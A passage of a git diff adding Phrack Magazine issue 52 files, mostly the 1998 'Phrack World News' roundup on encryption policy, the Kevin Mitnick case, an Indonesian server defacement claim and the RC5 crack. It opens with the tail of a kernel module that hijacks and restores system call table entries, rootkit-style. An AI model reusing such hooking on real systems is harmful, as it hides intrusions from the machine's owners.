+    o_socketcall = sys_call_table[SYS_socketcall];
+    sys_call_table[SYS_socketcall] = (void *) n_socketcall;
+    return 0;
+
+}
+
+
+void cleanup_module(void)
+{
+    sys_call_table[SYS_get_kernel_syms] = o_get_kernel_syms;
+    sys_call_table[SYS_getdents] = o_getdents;
+    sys_call_table[SYS_setuid] = o_setuid;
+    sys_call_table[SYS_socketcall] = o_socketcall;
+
+    if (__NR_myexecve != 0)
+	sys_call_table[__NR_myexecve] = 0;
+    sys_call_table[SYS_execve] = o_execve;
+
+    sys_call_table[SYS_ioctl] = o_ioctl;
+}
+<-->
+
+----[  EOF
diff --git a/phrack52/19.txt b/phrack52/19.txt
new file mode 100644
index 0000000..1959511
--- /dev/null
+++ b/phrack52/19.txt
@@ -0,0 +1,1355 @@
+---[  Phrack Magazine   Volume 8, Issue 52 January 26, 1998, article 19 of 20
+
+
+-------------------------[  P H R A C K     W O R L D     N E W S
+
+Phrack World News - 52
+
+New categorization:
+        -[ Stories
+        -[ Book Releases
+        -[ Conventions
+        -[ Other Headlines of Interest
+
+--------[  Issue 52
+
+
+ 0x1: Hacker Acquitted & Iraq Computerises
+ 0x2: The Impact of Encryption on Public Safety
+ 0x3: Urban Ka0s -- 26 Indonesian Servers Haxed 
+ 0x4: Hacker accused of sabotaging Forbes computers
+ 0x5: Privacy, Inc. Unveils its Internet Background Check
+ 0x6: Commerce Dept encryption rules declared unconstitutional
+ 0x7: The Million Dollar Challenge
+ 0x8: High Profile Detainee Seeks Legal Help
+ 0x9: Kevin Mitnick Press Release
+ 0xa: SAFE crypto bill cracked again
+ 0xb: RC5 Cracked -  The unknown message is...
+ 0xc: Kashpureff in custody.
+ 0xd: XS4ALL refuses Internet tap
+ 0xe: The FCC Wants V-Chip in PCs too
+
+ 1x1: Book Title: Underground (review)
+ 1x2: Book Title: The Electronic Privacy Papers
+ 1x3: Book Title: "Computer Security and Privacy: An Information Sourcebook..
+
+ 2x0: Convention: <none>
+
+ 3x1: Misc: Civil Liberties Groups ask FCC to Block FBI Proposal
+ 3x2: Misc: Anti-Spam Bills in Congress
+ 3x3: Misc: Justice Dept Charges Microsoft.. 
+ 3x4: Misc: Small Minds Think Alike
+ 3x5: Misc: Cyber Promotions tossed offline 
+
+0x1>-------------------------------------------------------------------------
+
+[submitted by: the wizard of id]
+
+Phrack,                                                 
+
+I thought that you guys may be able to make use of these articles which I
+found in my newspaper's IT section. Perhaps you should pass them on to the
+editors of Phrack World News.
+
+<start article 1>
+
+Hacker Acquitted
+================
+Extract from The Age, Victoria, Australia.                   -Tuesday
+11/25/97
+
+The US Air Force failed last Friday to convince Woolwich Crown Court in
+the UK that Matthew Bevan, 23, hacked into its secret files with his home
+computer. Computer guru Bevan was cleared of all accusations, which led to
+fears of US national security risk. He was charged with three offences of
+"unauthorised access and modification" into sensitive research and
+development files at New York's Griffiss Air Force Base and Lockheed Space
+and Missle Company in California via the Internet.
+
+
+<end article 1>
+
+The article is accompanied by a very cool picture of Bevan in a black
+suit, wearing mirrored sunglasses. :)
+
+<start article 2>
+
+Iraq Computerises
+=================
+Extract from The Age, Victoria, Australia.                   -Tuesday
+11/25/97
+
+To conceal its deadliest arms from U.N. weapons inspectors, Iraq increasingly
+has turned to computers, including American brands sold to Baghdad since
+the end of the 1991 Persian Gulf War in violation of international sanctions,
+according to US officials and U.N. diplomats.
+
+Iraq is using mostly Western-made computers for two cirtical functions: To
+transfer data from bulky paper to small disks that they can easilly
+disperse, making the information difficult for U.N. weapons inspection
+teams to track.
+
+For research and development in all four categories of weapons Iraq has
+been forbidden from keeping under terms of the U.N. resolution ending the
+war - nuclear, chemical and biological weapons and long-rnge missiles.
+
+Because of shifting tactics, computer specialists have become an ever more
+important component of the weapons inspections teams, US and U.N. sources
+say.
+
+Their work often involves digging into hard drives and unearthing material
+that was erased after being transferred to disks.
+
+<end article 2>
+
+0x2>-------------------------------------------------------------------------
+
+[submitted by: Mike Kretsch]
+
+Statement of Louis J. Freeh, Director
+Federal Bureau of Investigation
+
+Before the Permanent Select Committee on
+Intelligence, United States House of Representatives
+Washington, D. C.
+September 9, 1997
+
+This man must be stopped.  For other fun reading,
+check out his statements about the FBI's International
+Crime fighting efforts.  Errrr.  Wasnt international
+supposed to be CIA and domestic FBI?
+
+
+                                         The Impact of Encryption
+                                                 on Public Safety
+
+
+                              Statement of Louis J. Freeh, Director
+                                Federal Bureau of Investigation
+
+                      Before the Permanent Select Committee on Intelligence
+                             United States House of Representatives
+
+                                       Washington, D. C.
+                                       September 9, 1997
+
+Mr. Chairman and members of the committee, I appreciate the opportunity to
+discuss the issue of encryption and I applaud your willingness to deal with
+this vital public safety issue.
+
+The looming spectre of the widespread use of robust, virtually unbreakable
+encryption is one of the most difficult problems confronting law enforcement
+as the next century approaches. At stake are some of our most valuable and
+reliable investigative techniques, and the public safety of our citizens.
+We believe that unless a balanced approach to encryption is adopted that
+includes a viable key management infrastructure that supports immediate
+decryption capabilities for lawful purposes, our ability to investigate
+and sometimes prevent the most serious crimes and terrorism will be severely
+impaired. Our national security will also be jeopardized.
+
+For law enforcement, framing the issue is simple. In this time of dazzling
+telecommunications and computer technology where information can have
+extraordinary value, the ready availability of robust encryption is
+essential. No one in law enforcement disputes that. Clearly, in today's
+world and more so in the future, the ability to encrypt both contemporaneous
+communications and stored data is a vital component of information security.
+
+As is so often the case, however, there is another aspect to the encryption
+issue that if left unaddressed will have severe public safety and national
+security ramifications. Law enforcement is in unanimous agreement that the
+widespread use of robust unbreakable encryption ultimately will devastate
+our ability to fight crime and prevent terrorism. Unbreakable encryption
+will allow drug lords, spies, terrorists and even violent gangs to
+communicate about their crimes and their conspiracies with impunity. We wll
+lose one of the few remaining vulnerabilities of the worst criminals and
+terrorists upon which law enforcement depends to successfully investigate
+and often prevent the worst crimes.
+
+For this reason, the law enforcement community is unanimous in calling for
+a balanced solution to this problem. Such a solution must satisfy both the
+commercial needs of industry for strong encryption and law enforcement's
+public safety decryption needs. In our view, any legislative approach that
+does not achieve such a balanced approach seriously jeopardizes the 
+long-term viability and usefulness of court-authorized access to transmitted
+as well as stored evidence and information. Electronic surveillance and
+search and seizure are techniques upon which law enforcement depends to
+ensure public safety and maintain national security.
+
+One such balanced solution to this problem is key recovery encryption.
+Under this approach, a decryption "key" for a given encryption product is
+deposited with a trustworthy key recovery agent for safe keeping. The key
+recovery agent could be a private company, a bank, or other commercial or
+government entity that meets established trustworthiness criteria. Should
+encryption users need access to their encrypted information, they could
+obtain the decryption key from the key recovery agent. Additionally, when
+law enforcement needs to decrypt criminal-related communications or computer
+files lawfully seized under established legal authorities, they too, under
+conditions prescribed by law and with the presentation of proper legal
+process, could obtain the decryption key from the key recovery agent. This
+is the only viable way to permit the timely decryption of lawfully seized
+communications or computer files that are in furtherance of criminal
+activity.
+
+The decryption key or information would be provided to the law enforcement
+agency under very strict controls and would be used only for its intended
+public safety purpose. Under this approach, the law-abiding would gain the
+benefits of strong, robust encryption products and services with emergency
+decryption capabilities and public safety and national security would be
+maintained--as manufacturers produce and sell encryption products that
+include features that allow for the immediate decryption of criminal-related
+encrypted communications or electronic information.
+
+This solution meets industry's information security and communications
+privacy needs for strong encryption while addressing law enforcement's
+public safety needs for immediate decryption when such products are used
+to conceal crimes or impending acts of terrorism or espionage.
+
+Some have argued that government policy makers should step aside and let
+market forces solely determine the direction of key recovery encryption,
+letting market forces determine the type of technologies that will be used
+and under what circumstances. They argue that most corporations that see
+the need for encryption will also recognize the need for, and even insist
+on, key recovery encryption products to secure their electronically stored
+information and to protect their corporate interests should an encryption
+key be lost, stolen or used by a rogue employee for extortion purposes.
+
+We agree that rational thinking corporations will act in a prudent manner
+and will insist on using key recovery encryption for electronically stored
+information. However, law enforcement has a unique public safety requirement
+in the area of perishable communications which are in transit (telephone
+calls, e-mail, etc.). It is law enforcement, not corporations, that
+has a need for the immediate decryption of communications in transit. There
+is extraordinary risk in trusting public safety and national security to
+market forces that rightfully are protecting important but unrelated
+interests. Law enforcement's needs will not be adequately addressed by
+this type of an approach.
+
+It is for this reason that government policy makers and Congress should
+play a direct role in shaping our national encryption policy and adopt a
+balanced approach that addresses both the commercial and the public safety
+needs. The adverse impact to public safety and national security associated
+with any type of "wait and see" or voluntary market force approach would
+be far too great of a price for the American public to pay.
+
+Several bills have recently been introduced which address encryption.
+Language in some of the proposed bills makes it unlawful to use encryption
+in the furtherance of criminal activity and set out procedures for law
+enforcement access to stored decryption keys in those instances where 
+key recovery encryption was voluntarily used. Only one of these bills,
+S. 909, comes close to meeting our core public safety, effective law
+enforcement, and national security needs. S. 909 takes significant strides 
+in the direction of protecting public safety by encouraging the use of key
+recovery encryption through market based incentives and other inducements.
+All of the other bills currently under consideration by the Congress, to
+include S. 376, S. 377 , and H.R. 695, would have a significant negative
+impact on public safety and national security and would risk great harm
+to our ability to enforce the laws and protect our citizens if enacted.
+
+Unfortunately, S. 909 still does not contain sufficient assurances that
+the impact on public safety and effective law enforcement caused by the
+widespread availability of encryption will be adequately addressed. We look
+forward to working with you to develop legislative accommodations that
+adequately address the public safety needs of law enforcement and a balanced
+encryption policy.
+
+Further, some argue the encryption "Genie is out of the bottle," and that
+attempts to influence the future use of encryption are futile. I do not
+believe that to be the case. Strong encryption products that include 
+decryption features for lawful purposes can, with government and industry
+support, become the standard for use in the global information
+infrastructure.
+
+No one contends that the adoption of a balanced encryption policy will
+prevent all criminals, spies and terrorists from gaining access to and
+using unbreakable encryption. But if we, as a nation, act responsibly
+and only build systems and encryption products that support and include
+appropriate decryption features, all facets of the public's interest can
+be served.
+
+And as this committee knows, export controls on encryption products exist
+primarily to protect national security and foreign policy interests.
+However, law enforcement is more concerned about the significant and
+growing threat to public safety and effective law enforcement that would
+be caused by the proliferation and use within the United States of a
+communications infrastructure that supports the use of strong encryption
+products but that does not support law enforcement's immediate decryption
+needs. Without question, such an infrastructure will be used by dangerous
+criminals and terrorists to conceal their illegal plans and activities
+from law enforcement, thus inhibiting our ability to enforce the laws
+and prevent terrorism.
+
+Congress has on many occasions accepted the premise that the use of
+electronic surveillance is a tool of utmost importance in terrorism cases
+and in many criminal investigations, especially those involving serious
+and violent crime, terrorism, espionage, organized crime, drug-trafficking,
+corruption and fraud. There have been numerous cases where law enforcement,
+through the use of electronic surveillance, has not only solved and
+successfully prosecuted serious crimes and dangerous criminals, but has
+also been able to prevent serious and life-threatening criminal acts. For
+example, terrorists in New York were plotting to bomb the United Nations
+building, the Lincoln and Holland tunnels, and 26 Federal Plaza as well as
+conduct assassinations of political figures. Court-authorized electronic
+surveillance enabled the FBI to disrupt the plot as explosives were being
+mixed. Ultimately, the evidence obtained was used to convict the
+conspirators. In another example, electronic surveillance was used to
+prevent and then convict two men who intended to kidnap, molest and then
+kill a male child.
+
+Most encryption products manufactured today do not contain features that
+provide for immediate law enforcement decryption. Widespread use of
+unbreakable encryption or communications infrastructure that supports the
+use of unbreakable encryption clearly will undermine law enforcement's
+ability to effectively carry out its public safety mission and to combat
+dangerous criminals and terrorists.
+
+This is not a problem that will begin sometime in the future. Law
+enforcement is already encountering the harmful effects of encryption
+in many important investigations today. For example:
+
+     convicted spy Aldrich Ames was told by the Russian Intelligence
+     Service to encrypt computer file information that was to be passed
+     to them. an international terrorist was plotting to blow up 11
+     U.S.-owned commercial airliners in the Far East. His laptop computer
+     which was seized during his arrest in Manilla contained encrypted
+     files concerning this terrorist plot. a subject in a child pornography
+     case used encryption in transmitting obscene and pornographic images
+     of children over the Internet. a major international drug trafficking
+     subject recently used a telephone encryption device to frustrate
+     court-approved electronic surveillance.
+
+Requests for cryptographic support pertaining to electronic surveillance
+interceptions from FBI field offices and other law enforcement agencies
+have steadily risen over the past several years. For example, from 1995
+to 1996, there was a two-fold increase (from 5 to 12) in the number of
+instances where the FBI's court-authorized electronic efforts were frustrated
+by the use of encryption products that did not allow for lawful law
+enforcement decryption.
+
+Over the last three (3) years, the FBI has also seen the number of
+computer-related cases utilizing encryption and/or password protection
+increase from 20 or two (2) percent of the cases involving electronically
+stored information to 140 or seven (7) percent. These included the use of
+56-bit data encryption standard (DES) and 128-bit "pretty good privacy"
+(PGP) encryption.
+
+Just as when the Congress so boldly addressed the digital telephony issue
+in 1994, the government and the nation are again at an historic crossroad
+on this issue. The Attorney General and the heads of federal law enforcement
+agencies as well as the presidents of several state and local law enforcement
+associations recently sent letters to every member of Congress urging the
+adoption of a balanced encryption policy. In addition, the International
+Association of Chiefs of Police, the National Sheriff's Association and
+the National District Attorneys Association have all enacted resolutions
+supporting a balanced encryption policy and opposing any legislation that
+undercuts or falls short such a balanced policy.
+
+If public policy makers act wisely, the safety of all Americans will be
+enhanced for decades to come. But if narrow interests prevail, then law
+enforcement will be unable to provide the level of protection that people
+in a democracy properly expect and deserve.
+
+                                          Conclusion
+
+We are not asking that the magnificent advances in encryption technology
+be abandoned. We are the strongest proponents of robust, reliable encryption
+manufactured and sold by American companies all over the world. Our position
+is simple and, we believe, vital. Encryption is certainly a commercial
+interest of great importance to this great nation. But it's not merely a
+commercial or business issue. To those of us charged with the protection of
+public safety and national security, encryption technology and its
+application in the information age--here at the dawn of the 21st century
+and thereafter--will become a matter of life and death in many instances
+which will directly impact on our safety and freedoms. Good and sound
+public policy decisions about encryption must be made now by the Congress
+and not be left to private enterprise. Legislation which carefully balances
+public safety and private enterprise must be established with respect to
+encryption.
+
+Would we allow a car to be driven with features which would evade and outrun
+police cars? Would we build houses or buildings which firefighters could not
+enter to save people?
+
+Most importantly, we are not advocating that the privacy rights or personal
+security of any person or enterprise be compromised or threatened. You can't
+yell "fire" in a crowded theater. You can't with impunity commit libel or
+slander. You can't use common law honored privileges to commit crimes.
+
+In support of our position for a rational encryption policy which balances
+public safety with the right to secure communications, we rely on the Fourth
+Amendment to the Constitution. There the framers established a delicate
+balance between "the right of the people to be secure in their persons,
+houses, papers, and effects (today we might add personal computers, modems,
+data streams, discs, etc.) against unreasonable searches and seizures."
+Those precious rights, however, were balanced against the legitimate right
+and necessity of the police, acting through strict legal process, to gain
+access by lawful search and seizure to the conversations and stored evidence
+of criminals, spies and terrorists.
+
+The precepts and balance of the Fourth Amendment have not changed or altered.
+What has changed from the late eighteenth to the late twentieth century is
+technology and telecommunications well beyond the contemplation of the
+framers.
+
+The unchecked proliferation of unbreakable encryption will drastically
+change the balance of the Fourth Amendment in a way which would shock its
+original proponents. Police soon may be unable through legal process and
+with sufficient probable cause to conduct a reasonable and lawful search
+or seizure, because they cannot gain access to evidence being channeled or
+stored by criminals, terrorists and spies. Significantly, their lack of
+future access may be in part due to policy decisions about encryption made
+or not made by the United States. This would be a terrible upset of the
+balance so wisely set forth in the Fourth Amendment on December 15, 1791.
+I urge you to maintain that balance and allow your police departments,
+district attorneys, sheriffs and federal law enforcement authorities to
+continue to use their most effective techniques to fight crime and
+terrorism--techniques well understood and authorized by the framers and
+Congress for over two hundred years.
+
+I look forward to working with you on this matter and at this time would
+be pleased to answer any questions.
+
+
+0x3>-------------------------------------------------------------------------
+
+Subject: Urban Ka0s -- 26 Indonesian Servers Haxed
+
+
+Greetings Phrack,
+
+Today, our group (Urban Ka0s) and several portuguese Hackers attacked
+several Indonesian servers, in order to defend East Timor rights!
+
+        We are Portuguese Hackers Agaisnt Indonesian Tirany.
+
+        "Thix Site Was Haxed & Deleted by PHAiT. This attack is not
+         against indonesian people but against its government and their
+         opression towards the republic of timor. These actions were
+         made to honour and remember all the 250 people killed in Dili
+         on the 12 november 1991.
+
+         As a result all sites belonging to indonesia's goverment were
+         erased, the rest only had their webpages changed."
+
+East Timor, One People, One Nation
+
+        "Whether it is in Tibet or Poland, the Baltics or the
+        South Pacific, Africa or the Caribbean, it has been shown
+        that force and repression can never totally suffocate the
+        reasons underlying the existence of a people: pride in its
+        own identity, capacity to preserve, without restriction,
+        everything that identifies it as such, freedom to pass all
+        this on to future generations, in brief, the right to manage
+        its own destiny."
+
+Xanana Gusmo
+October 5, 1989 
+
+        Please inform all ciber citizens of this action.
+
+        Our contact is at:
+        -- Urban Ka0s --
+        http://urbankaos.org
+        irc: PT-Net irc.urbankaos.org
+
+0x4>-------------------------------------------------------------------------
+
+Title: Hacker accused of sabotaging Forbes computers
+Source: Infobeat News
+Author: unknown
+Date: unknown
+
+A former temporary computer technician at business publisher Forbes
+Inc has been charged with sabotage and causing a massive crash of the
+firm's computer network, prosecutors said. According to the complaint
+filed in Manhattan Federal Court and unsealed Monday, George Mario
+Parente, 30, of Howard Beach in the borough of Queens was accused of
+hacking his way into the Forbes' network in April from his home,
+using an unauthorized password. Prosecutors alleged he erased vital
+information including budgets and salary from Forbes' computers
+because he was angry with the company after he was fired.
+
+0x5>-------------------------------------------------------------------------
+
+Title: Privacy, Inc. Unveils its Internet Background Check
+Source: 
+Author: unknown
+Date: August 1, 1997
+
+Aurora, Colorado
+
+Privacy, Inc. (www.privacyinc.com) today released its Internet Background
+Check, a utility that empowers users to determine if they are at risk from
+the plethora of databases that are being placed on the Internet.  Searches
+quickly scan through hundreds of databases beng placed on-line by state and
+local governments and law enforcement angencies in categories such as:
+
+   * Registered Sex Offenders and Predators
+   * Deadbeat Parents
+   * Wanted Persons
+   * Missing Persons
+   * Arrest/Prison
+
+'The Computer Is Never Wrong'
+
+"Errors and risks of mistaken identity in this data are a key concern," says
+Edward Allburn, founder and president of Privacy, Inc.  The recent flurry of
+activity by government and law enforcement agencies to distribute such
+volatile information on the Internet creates an environment that potentially
+places innocent people at risk, especially for mistaken identity.
+
+Advanced technology was incorporated into the development of the Internet
+Background Check with this risk in mind.  This technology allows users to
+also search for names that look and/or sound similar to their own while still
+delivering highly focused results that standard Internet search engines
+(such as Yahoo! and Lycos) are incapable of producing.
+
+One More Tool
+
+The release provides one more tool for consumers to protect themselves in the
+Information Age.  Additional resources provided by Privacy, Inc. include:
+   * Consumer Privacy Guide
+   * Government Database Guide
+   * Government Dossier Service
+   * David Sobel's Legal FAQ
+   * Privacy News Archive, updated weekly
+
+Guido, the Cyber-Bodyguard is another utility planned to be released in the
+coming months.  Guido will interface with the Internet Background Check to
+automatically alert users via e-mail if/when their name appears in a new or
+updated database, in effect monitoring the Internet so users don't have to.
+
+0x6>-------------------------------------------------------------------------
+
+Title: Commerce Dept encryption rules declared unconstitutional
+Source: fight-censorship@vorlon.mit.edu 
+Author: unknown
+Date: unknown
+
+A Federal judge in San Francisco ruled today that the Commerce
+Department's export controls on encryption products violate the
+First Amendment's guarantees of freedom of speech.
+
+In a 35-page decision, U.S. District Judge Marilyn Patel said the
+Clinton administration's rules violate "the First Amendment on the
+grounds of prior restraint and are, therefore, unconstitutional."
+Patel reaffirmed her December 1996 decision against the State
+Department regulations, saying that the newer Commerce Department
+rules suffer from similar constitutional infirmities.
+
+Patel barred the government from "threatening, detaining,
+prosecuting, discouraging, or otherwise interfering with" anyone
+"who uses, discusses, or publishes or seeks to use, discuss or
+publish plaintiff's encryption programs and related materials."
+Daniel Bernstein, now a math professor at the University of
+Illinois, filed the lawsuit with the help of the Electronic
+Frontier Foundation.
+
+Patel dismissed the State, Energy, and Justice departments and
+CIA as defendants. President Clinton transferred jurisdiction over
+encryption exports from the State to the Commerce department on
+December 30, 1996.
+
+The Justice Department seems likely to appeal the ruling to the
+Ninth Circuit, which could rule on the case in the near future.
+
+0x7>-------------------------------------------------------------------------
+
+Title: The Million Dollar Challenge
+Source: unknown mail list
+
+Ultimate Privacy, the e-mail encryption program combining ease
+of use with unbreakability.
+
+Ultimate Privacy is serious cryptography. On the Links page we
+have links to other Internet sites that discuss One-Time Pad
+cryptography and why it is unbreakable when properly
+implemented.
+
+Nevertheless, should you wish to try, the first person to be able
+to discern the original message within a year (following the
+simple requirements of the Challenge) will actually receive the
+million dollar prize as specified in the Rules page. The prize
+is backed by the full faith and credit of Crypto-Logic
+Corporation and its insurors.
+
+You might be interested in to know how the Challenge was done. We
+used a clean, non-network-connected computer. After installing
+Ultimate Privacy, one person alone entered the Challenge message
+and encrypted it. After making a copy of the encrypted message,
+we removed the hard disk from the computer and it was
+immediately transported to a vault for a year.
+
+Therefore, the original message is not known by Crypto-Logic
+Corporation staff (other than the first few characters for
+screening purposes), nor are there any clues to the original
+message on any media in our offices.
+
+0x8>-------------------------------------------------------------------------
+
+Title: High Profile Detainee Seeks Legal Help
+Source: fight-censorship@vorlon.mit.edu 
+Author: unknown
+Date: September 3, 1997
+
+
+Mr. Kevin Mitnick has been detained in Federal custody without
+bail on computer "hacking" allegations for over thirty months.
+Having no financial resources, Mr. Mitnick has been appointed
+counsel from the Federal Indigent Defense Panel.  As such, Mr.
+Mitnick's representation is limited; his attorney is not permitted
+to assist with civil actions, such as filing a Writ of Habeas
+Corpus.
+
+For the past two years, Mr. Mitnick has attempted to assist in his
+own defense by conducting legal research in the inmate law library
+at the Metropolitan Detention Center (hereinafter "MDC") in Los
+Angeles, California.  Mr. Mitnick's research includes reviewing
+court decisions for similar factual circumstances which have
+occurred in his case.  MDC prison officials have been consistently
+hampering Mr. Mitnick's efforts by denying him reasonable access
+to law library materials.  Earlier this year, Mr. Mitnick's lawyer
+submitted a formal request to Mr. Wayne Siefert, MDC Warden,
+seeking permission to allow his client access to the law library
+on the days set aside for inmates needing extra law library time.
+The Warden refused.
+
+In August 1995, Mr. Mitnick filed an administrative remedy request
+with the Bureau of Prisons complaining that MDC policy in
+connection with inmate access to law library materials does not
+comply with Federal rules and regulations.  Specifically, the
+Warden established a policy for MDC inmates that detracts from
+Bureau of Prison's policy codified in the Code of Federal
+Regulations.
+
+Briefly, Federal law requires the Warden to grant additional law
+library time to an inmate who has an "imminent court deadline".
+The MDC's policy circumvents this law by erroneously interpreting
+the phrase "imminent court deadline" to include other factors,
+such as, whether an inmate exercises his right to assistance of
+counsel, or the type of imminent court deadline.
+ For example, MDC policy does not consider detention (bail),
+motion, status conference, or sentencing hearings as imminent
+court deadlines for represented inmates.  MDC officials use this
+policy as a tool to subject inmates to arbitrary and capricious
+treatment.  It appears MDC policy in connection with inmate legal
+activities is inconsistent with Federal law and thereby affects
+the substantial rights of detainees which involve substantial
+liberty interests.
+
+In June 1997, Mr. Mitnick finally exhausted administrative
+remedies with the Bureau of Prisons.  Mr. Mitnick's only avenue of
+vindication is to seek judicial review in a Court of Law.  Mr.
+Mitnick wishes to file a Writ of Habeas Corpus challenging his
+conditions of detention, and a motion to compel Federal
+authorities to follow their own rules and regulations.
+
+Mr. Mitnick is hoping to find someone with legal experience, such
+as an attorney or a law student willing to donate some time to
+this cause to insure fair treatment for everyone, and to allow
+detainees to effectively assist in their own defense without
+"Government" interference.  Mr. Mitnick needs help drafting a
+Habeas Corpus petition with points and authorities to be submitted
+by him pro-se.  His objective is to be granted reasonable access
+to law library materials to assist in his own defense.
+
+If you would like to help Kevin, please contact him at the
+following address:
+
+	Mr. Kevin Mitnick
+	Reg. No. 89950-012
+	P.O. Box 1500
+	Los Angeles, CA 90053-1500
+
+0x9>-------------------------------------------------------------------------
+
+Title: Kevin Mitnick Press Release
+Source: Press Release
+Author: Donald C. Randolph
+Date: August 7, 1997
+
+THE UNITED STATES V. KEVIN DAVID MITNICK
+
+I.  Proceedings to Date
+
+With 25 counts of alleged federal computer and wire fraud violations still
+pending against him, the criminal prosecution of Kevin Mitnick is
+approaching its most crucial hour.  The trial is anticipated to begin in
+January, 1998.  In reaching this point, however, Kevin has already
+experienced years of legal battles over alleged violations of the
+conditions of his supervised release and for possession of unauthorized
+cellular access codes.
+
+A.  Settling the "Fugitive" Question
+
+The seemingly unexceptional charges relating to supervised release
+violations resulted in months of litigation when the government attempted
+to tack on additional allegations for conduct occurring nearly three years
+after the scheduled expiration of Kevin's term of supervised release in
+December, 1992.  The government claimed that Kevin had become a fugitive
+prior to the expiration of his term, thereby "tolling" the term and
+allowing for the inclusion of additional charges.  After months of
+increasingly bold assertions concerning Kevin's "fugitive" status,
+evidentiary hearings were held in which the government was forced to
+concede that its original position in this matter was unsupported by the
+facts.
+
+B.  Sentencing
+
+In June of this year Kevin was sentenced for certain admitted violations of
+his supervised release and for possession of unauthorized access codes.
+The court imposed a sentence of 22 months instead of the 32 months sought
+by the government.  Since Kevin has been in custody since his arrest in
+February 1995, this sentence has been satisfied.  We are currently
+preparing a request for release on bail.
+
+During this stage of the proceedings, the government sought to impose
+restrictions on Kevin's access to computers which were so severe as to
+virtually prohibit him from functioning altogether in today's society.  The
+proposed restrictions sought to completely prohibit Kevin from "using or
+possessing" all computer hardware equipment, software programs, and
+wireless communications equipment.  After arguments that such restrictions
+unduly burdened Kevin's freedom to associate with the on-line computer
+community and were not reasonably necessary to ensure the protection of the
+public, the court modified its restrictions by allowing for computer access
+with the consent of the Probation Office.  Nonetheless, the defense
+believes that the severe restrictions imposed upon Mr. Mitnick are
+unwarranted in this case and is, therefore, pursuing an appeal to the Ninth
+Circuit.
+
+II.  The Government Seeks to make an Example of Mr. Mitnick
+
+One of the strongest motivating factors for the government in the
+prosecution of Kevin Mitnick is a desire to send a message to other
+would-be "hackers".  The government has hyped this prosecution by
+exaggerating the value of loss in the case, seeking unreasonably stiff
+sentences, and by painting a portrait of Kevin which conjures the likeness
+of a cyber-boogie man.
+
+There are a number of objectives prompting the government's tactics in this
+respect.  First, by dramatically exaggerating the amount of loss at issue
+in the case (the government arbitrarily claims losses exceed some $80
+million) the government can seek a longer sentence and create a
+high-profile image for the prosecution.  Second, through a long sentence
+for Kevin, the government hopes to encourage more guilty pleas in future
+cases against other hackers.  For example, a prosecutor offering a moderate
+sentence in exchange for a guilty plea would be able to use Kevin Mitnick's
+sentence as an example of what "could happen" if the accused decides to go
+to trial.  Third, by striking fear into the hearts of the public over the
+dangers of computer hackers, the government hopes to divert scrutiny away
+from its own game-plan regarding the control and regulation of the Internet
+and other telecommunications systems.
+
+III.  Crime of Curiosity
+
+The greatest injustice in the prosecution of Kevin Mitnick is revealed when
+one examines the actual harm to society (or lack thereof) which resulted
+from Kevin's actions.  To the extent that Kevin is a "hacker" he must be
+considered a purist.  The simple truth is that Kevin never sought monetary
+gain from his hacking, though it could have proven extremely profitable.
+Nor did he hack with the malicious intent to damage or destroy other
+people's property.  Rather, Kevin pursued his hacking as a means of
+satisfying his intellectual curiosity and applying Yankee ingenuity.  These
+attributes are more frequently promoted rather than punished by society.
+
+The ongoing case of Kevin Mitnick is gaining increased attention as the
+various issues and competing interests are played out in the arena of the
+courtroom.  Exactly who Kevin Mitnick is and what he represents, however,
+is ultimately subject to personal interpretation and to the legacy which
+will be left by "The United States v. Kevin David Mitnick".
+
+0xa>-------------------------------------------------------------------------
+
+Title: SAFE crypto bill cracked again
+Source: 
+Author: By Alex Lash and Dan Goodin
+Date: September 12, 1997, 8:40 a.m. PT
+
+For the second time in a week, a House committee has made significant
+changes to the Security and Freedom through Encryption (SAFE) Act to
+mandate that domestic encryption products give law enforcement agencies
+access to users' messages.
+
+The changes by the Intelligence Committee, which were passed as a
+"substitute" to SAFE, turn the legislation on its head. The amendment
+follows similar changes two days ago in the House National Security
+Committee.
+
+Initially drafted as a way to loosen U.S. export controls on encryption,
+legislators have instead "marked up" the bill, or amended it at the
+committee level, to reflect the wishes of the Federal Bureau of
+Investigation and other law enforcement agencies that want "wiretap"
+access to all encrypted email and other digital files.
+
+Both the Intelligence and the National Security committees tend to favor
+export controls, because they view encryption as a threat to
+information-gathering activities by U.S. military and law enforcement
+officials.
+
+The Intelligence Committee cited those concerns today when announcing
+the substitute legislation. "Terrorist groups...drug cartels...and those
+who proliferate in deadly chemical and biological weapons are all
+formidable opponents of peace and security in the global society," said
+committee chairman Porter Goss (R-Florida) in a statement. "These bad
+actors must know that the U.S. law enforcement and national security
+agencies, working under proper oversight, will have the tools to
+frustrate illegal and deadly activity and bring international criminals
+to justice."
+
+Opponents of government attempts to regulate encryption, including a
+leading panel of cryptographers, have argued that built-in access to
+encrypted files would in fact threaten national and individual security
+and be prohibitively expensive to implement.
+
+The amended legislation calls for all imported or U.S.-made encryption
+products that are manufactured or distributed after January 31, 2000, to
+provide "immediate access" to the decrypted text if the law officials
+present a court order. "Law enforcement will specifically be required to
+obtain a separate court order to have the data, including
+communications, decrypted."
+
+A markup of the same bill in the House Commerce Committee was postponed
+today for two weeks. It will be the fifth such committee vote on the
+bill since its introduction.
+
+The Intelligence and National Security amendments this week are by no
+means a defeat of the bill. Instead, they would have to be reconciled
+with versions of the bill already approved by the House Judiciary and
+International Relations committees. That reconciliation most likely
+would have to happen on the House floor. The rapidly fragmenting bill
+still has several layers of procedure to wend through before it reaches
+a potential floor vote, but people on both sides of the encryption
+debate openly question if the bill--in any form--will make it that far
+this year.
+
+The legislation has 252 cosponsors, more than half of the House
+membership.
+
+0xb>-------------------------------------------------------------------------
+
+Title: RC5 Cracked -  The unknown message is...
+Source: 
+Author: David McNett <nugget@slacker.com>[:]
+Date: Mon, 27 Oct 1997 08:43:38 -0500
+
+
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA1
+
+It is a great privilege and we are excited to announce that at 13:25
+GMT on 19-Oct-1997, we found the correct solution for RSA Labs' RC5-
+32/12/7 56-bit secret-key challenge.  Confirmed by RSA Labs, the key
+0x532B744CC20999 presented us with the plaintext message for which we
+have been searching these past 250 days.
+
+The unknown message is: It's time to move to a longer key length
+
+In undeniably the largest distributed-computing effort ever, the
+Bovine RC5 Cooperative (http://www.distributed.net/), under the
+leadership of distributed.net, managed to evaluate 47% of the
+keyspace, or 34 quadrillion keys, before finding the winning key.  At
+the close of this contest our 4000 active teams were processing over
+7 billion keys each second at an aggregate computing power equivalent
+to more than 26 thousand Pentium 200's or over 11 thousand PowerPC
+604e/200's.  Over the course of the project, we received block
+submissions from over 500 thousand unique IP addresses.
+
